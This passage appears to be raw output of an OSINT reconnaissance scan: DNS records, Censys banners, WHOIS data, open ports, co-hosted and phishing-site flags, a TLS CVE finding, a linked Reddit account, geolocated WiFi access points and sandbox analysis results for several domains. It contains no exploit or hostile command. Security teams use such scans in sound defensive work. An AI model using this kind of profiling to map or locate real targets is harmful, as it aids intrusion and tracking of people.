"assistant.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-11-15T19:04:22.316842630Z"}, "oytunjivillage.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:58.523823601Z"}, "beautybeyondhair.net": {"record_type": "A", "resolved_at": "2023-03-30T19:32:04.069794297Z"}, "ftp.netrobotic.ir": {"record_type": "A", "resolved_at": "2023-04-04T18:41:04.300955582Z"}, "faryabkhabar.ir": {"record_type": "A", "resolved_at": "2022-12-17T14:50:17.458081363Z"}, "de.helsinkicard.com": {"record_type": "A", "resolved_at": "2023-04-28T15:19:37.298278045Z"}, "demo.jamalghamari.com": {"record_type": "A", "resolved_at": "2023-04-24T14:59:01.147426415Z"}, "les1000volets.com": {"record_type": "A", "resolved_at": "2022-10-11T03:19:20.280901310Z"}, "lt.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-24T13:34:44.275517531Z"}, "diacounneirepuhar.ml": {"record_type": "A", "resolved_at": "2023-02-18T02:32:50.074200205Z"}, "mybots.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-12-02T15:15:41.628857633Z"}, "e-rundev.ir": {"record_type": "A", "resolved_at": "2023-05-07T17:49:10.633989137Z"}, "ectasy.wtf": {"record_type": "A", "resolved_at": "2023-05-05T04:39:30.020839530Z"}, "hola.organizoo.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:38.886997403Z"}, "pop.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-18T13:44:12.923874025Z"}, "www.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-16T17:06:44.448663582Z"}, "ritta.app": {"record_type": "A", "resolved_at": "2023-04-20T12:15:33.428852719Z"}, "odenneszolaca.cf": {"record_type": "A", "resolved_at": "2023-02-17T02:27:33.470439994Z"}}, "names": ["www.clinic.tanyar.org", "beautybeyondhair.buzz", "bezi386.xyz", "api.snoor.shop", "mail.mardinscarf.com", "compete.pics", "les1000volets.com", "megafrica.ao", "www.oxinpc.ir", "demo.jamalghamari.com", "cisp.su", "emberstreet.rocks", "total-ev-charge.com", "dl.jamalghamari.com", "inthemachine.com.au", "lt.makingprojec.com", "irancamping.com", "stafferty.lv", "www.wolny.poker", "barbecue-masters.dk", "stafferty.lt", "www.shop.charkhak.ir", "barbecuemasters.dk", "question-orthographe.net", "smtp.sharoshop.com", "www.mrandmrsdesousa.co.uk", "ftp.netrobotic.ir", "www.ostrovok.net", "oytunjivillage.net", "edu.rabinia.com", "ritta.app", "ftp.baharelm.ir", "landing.makingprojec.com", "www.irancamping.com", "wolny.poker", "e-rundev.ir", "web3rh.tk", "beautybeyondhair.net", "uncoveryourconfidence.org", "mybots.amirhsvip.ir", "www.vitanco.com.mx", "mail.lskala.com", "www.les1000volets.com", "faryabkhabar.ir", "finalsfootyfantasy.com.au", "ectasy.wtf", "assistant.amirhsvip.ir", "karriere-job-booster.at", "www.barbecue-masters.dk", "karriere-job-booster.com", "centrumpedikury.sk", "odenneszolaca.cf", "www.sanayepishro.com", "www.barbecuemasters.dk", "clinic.tanyar.org", "dubuy.dk", "mail.wolny.poker", "www.otherend.net", "hola.organizoo.net", "pop.makingprojec.com", "oscord.net", "diacounneirepuhar.ml", "en.jahanbaygan.com", "fi.helsinkicard.com", "www.alvandcenter.com", "mail.bokharsanat.com", "de.helsinkicard.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://188.114.97.1/"}, "response": {"body": "<!DOCTYPE html>\n<!--[if lt IE 7]> <html class=\"no-js ie6 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if IE 7]> <html class=\"no-js ie7 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if IE 8]> <html class=\"no-js ie8 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if gt IE 8]><!--> <html class=\"no-js\" lang=\"en-US\"> <!--<![endif]-->\n<head>\n<title>Direct IP access not allowed | Cloudflare</title>\n<meta charset=\"UTF-8\" />\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" />\n<meta name=\"robots\" content=\"noindex, nofollow\" />\n<meta name=\"viewport\" content=\"width=device-width,initial-scale=1\" />\n<link rel=\"stylesheet\" id=\"cf_styles-css\" href=\"/cdn-cgi/styles/main.css\" />\n\n\n<script>\n(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&JSON.stringify){var e=function(a){var c=document.getElementById(\"error-feedback-survey\"),d=document.getElementById(\"error-feedback-success\"),b=new XMLHttpRequest;a={event:\"feedback clicked\",properties:{errorCode:1003,helpful:a,version:1}};b.open(\"POST\",\"https://sparrow.cloudflare.com/api/v1/event\");b.setRequestHeader(\"Content-Type\",\"application/json\");b.setRequestHeader(\"Sparrow-Source-Key\",\"c771f0e4b54944bebf4261d44bd79a1e\");\nb.send(JSON.stringify(a));c.classList.add(\"feedback-hidden\");d.classList.remove(\"feedback-hidden\")};document.addEventListener(\"DOMContentLoaded\",function(){var a=document.getElementById(\"error-feedback\"),c=document.getElementById(\"feedback-button-yes\"),d=document.getElementById(\"feedback-button-no\");\"classList\"in a&&(a.classList.remove(\"feedback-hidden\"),c.addEventListener(\"click\",function(){e(!0)}),d.ad | 188.114.97.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Bikemap (Category: health)
https://www.bikemap.net/en/u/login/routes/created/ | login |
| 2023-05-12 03:03:27 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | nwapi.battleb0t.xyz |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nwapi2.battleb0t.xyz | [{"url": "https://nwapi2.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nwapi2.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [akashpmani.github.io]
https://www.openphish.com/feed.txt | akashpmani.github.io |
| 2023-05-12 03:03:20 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-fog.github.io |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 1 | 0 | None | text/html;charset=utf-8 | ayhu.xyz |
| 2023-05-12 03:09:59 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | amcodev.me | stage-sdb-n1-fra1.amcodev.me |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f6041aa868cdc-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:23:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.8:8080 | 188.114.96.0/24 |
| 2023-05-12 03:12:16 | Affiliate - Domain Whois | No | Whois | 0 | 0 | 6 | 0 | None | % Copyright (c)2023 by NIC.AT (1)
%
% Restricted rights.
%
% Except for agreed Internet operational purposes, no part of this
% information may be reproduced, stored in a retrieval system, or
% transmitted, in any form or by any means, electronic, mechanical,
% recording, or otherwise, without prior permission of NIC.AT on behalf
% of itself and/or the copyright holders. Any use of this material to
% target advertising or similar activities is explicitly forbidden and
% can be prosecuted.
%
% It is furthermore strictly forbidden to use the Whois-Database in such
% a way that jeopardizes or could jeopardize the stability of the
% technical systems of NIC.AT under any circumstances. In particular,
% this includes any misuse of the Whois-Database and any use of the
% Whois-Database which disturbs its operation.
%
% Should the user violate these points, NIC.AT reserves the right to
% deactivate the Whois-Database entirely or partly for the user.
% Moreover, the user shall be held liable for any and all damage
% arising from a violation of these points.
domain: beatrixhaller.at
registrar: easyname GmbH ( https://nic.at/registrar/414 )
registrant: <data not disclosed>
tech-c: <data not disclosed>
nserver: ns1.easyname.eu
nserver: ns2.easyname.eu
changed: 20220307 12:53:33
source: AT-DOM
| beatrixhaller.at |
| 2023-05-12 03:22:52 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.96.1:80 | 188.114.96.1 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | JDKolgen (Net ID: 00:0C:F6:CC:40:31) | 50.8897, 6.0563 |
| 2023-05-12 02:53:32 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.111.0/24 | 185.199.111.153 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00arthur00.github.io | 185.199.111.153 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 4 | 0 | None | GitHub.com | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 02:45:56 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 4 | 0 | None | 39.0469, -77.4903 | 2600:1f18:2489:8201::c8 |
| 2023-05-12 02:57:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.vrcarena.com/species/dQLXfvdRHnc8JmSFeTy1/avatar', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"\n "142.251.211.234:443"\n "142.251.215.232:443"\n "142.250.217.99:443"\n "52.85.247.97:443"\n "142.250.69.206:443"\n "104.18.27.135:443"\n "52.85.247.24:443"\n "54.230.18.97:443"\n "104.244.42.200:443"\n "142.250.217.80:443"\n "52.85.247.96:443"\n "104.46.162.224:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6844:120:WilError_01"\n "Local\\SM0:6596:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:6596:120:WilError_01"\n "Local\\SM0:6844:304:WilStaging_02"\n "Local\\SM0:6844:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6844:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4044:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\6844_544713811\\Part-RU]- [targetUID: 00000000-00006844]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006844]\n "f_00023e" has type "gzip compressed data last modified: Wed Nov 2 19:43:37 2022 from Unix original size modulo 2^32 98857"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00006844]\n "84e68c01236e4db9_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\84e68c01236e4db9_0]- [targetUID: 00000000-00006844]\n "c36ee6c5c3d6defa_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\c36ee6c5c3d6defa_0]- [targetUID: 00000000-00006844]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ZxcvbnData\\3.0.0.0\\manifest.fingerprint]- [targetUID: 00000000-00006844]\n "4c619ea7-d902-43ed-b735-14327b833f02.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4c619ea7-d902-43ed-b735-14327b833f02.tmp]- [targetUID: 00000000-00006844]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6844_2131939810\\shopping_iframe_driver.js]- [targetUID: 00000000-00006844]\n "96de8815-40a5-4b15-9b75-d58711f01a5f.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\96de8815-40a5-4b15-9b75-d58711f01a5f.tmp]- [targetUID: 00000000-00006844]\n "f_00023d" has type "gzip compressed data max compression original size modulo 2^32 50230"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00006896]\n "3cec8455-ee81-40cf-a112-d3662d1d59c2.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\3cec8455-ee81-40cf-a112-d3662d1d59c2.tmp]- [targetUID: 00000000-00006896]\n "4491cd861a319b67_0" has type "data"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6844_2131939810\\shopping.js]- [targetUID: 00000000-00006844]\n "c0110775-0c41-4f39-bee8-7b05c4fac42c.tmp" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6844_2131939810\\auto_open_controller.js]- [targetUID: 00000000-00006844]\n "deny_domains.list" has type "data"- Location: [%TEMP%\\6844_2018864076\\deny_domains.list]- [targetUID: 00000000-00006844]\n "ec03c6bc0dd41943_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\ec03c6bc0dd41943_0]- [targetUID: 00000000-00006844]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\WebStorage\\QuotaManager-journal]- [targetUID: 00000000-00006844]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\6844_544713811\\Part-NL]- [targetUID: 00000000-00006844]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006844]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.vrcarena.com/species/dQLXfvdRHnc8JmSFeTy1/avatar"\n Pattern match: "https://www.vrcarena.com"\n Heuristic match: "_11__vlcarena.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\6844_2131939810\\shopping_iframe_driver.js]- [targetUID: 00000000-00006844]\n Dropped file: "shopping.js" - Location: [%TEMP%\\6844_2131939810\\shopping.js]- [targetUID: 00000000-00006844]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\6844_2131939810\\auto_open_controller.js]- [targetUID: 00000000-00006844]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\6844_2131939810\\shoppingfre.js]- [targetUID: 00000000-00006844]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\6844_2131939810\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006844]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\6844_2131939810\\edge_tracking_page_validator.js]- [targetUID: 00000000-00006844]\n Dropped file: "product_page.js" - Location: [%TEMP%\\6844_2131939810\\product_page.js]- [targetUID: 00000000-00006844]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\6844_544713811\\adblock_snippet.js]- [targetUID: 00000000-00006844]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\6844_2131939810\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00006844]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\6844_544713811\\Part-RU]- [targetUID: 00000000-00006844]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00006844-00000BE4-12250267518\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00006844-00000BE6-28199932469\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\1f4ff203-90ab-4416-938f-e487c16d6306" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00006844-00000BE4-28209209127\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00006844-00000BE6-42546228845\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EntityExtraction" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00006844-00000BE4-80289175563\n "C:\\Users\\HAPUBWS\\AppData\\Local | 34.148.97.127 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.182): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:21 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-tikaro.github.io |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/battleb0t | battleb0t |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs |
| 2023-05-12 03:00:51 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000.lt | 185.199.111.153 |
| 2023-05-12 03:35:41 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'LI', u'country_tld': u'.nl', u'ip': u'45.131.109.53', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Eygelshoven', u'network': u'45.131.109.0/24', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 50.8897, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'SYNLINQ', u'postal': u'6471', u'asn': u'AS44486', u'country': u'NL', u'region': u'Limburg', u'longitude': 6.0563, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} | 45.131.109.53 |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.225): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Eminent_5G (Net ID: 00:14:5C:91:C2:74) | 50.8897, 6.0563 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.77): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/withat_4.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Airport ST FRA (Net ID: 00:02:2D:07:C4:ED) | 50.1188, 8.6843 |
| 2023-05-12 02:45:25 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/twbs/bootstrap/blob/master/license)', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://espressif.github.io/esptool-js/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3628"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e2c_IE_EarlyTabStart_0x76c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e2c_ConnHashTable<3628>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e2c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e2c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "IsoScope_e2c_IE_EarlyTabStart_0x76c_Mutex"\n "IsoScope_e2c_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.18.11.207:443"\n "151.101.1.229:443"\n "142.250.191.42:443"\n "142.250.189.234:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "cdn.jsdelivr.net"\n "espressif.github.io"\n "fonts.googleapis.com"\n "maxcdn.bootstrapcdn.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "* Copyright 2011-2019 Twitter, Inc." (Indicator: "dir "; File: "bootstrap.min_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"esp-logo_1_.png" has type "PNG image data 200 x 200 8-bit/color RGB non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', 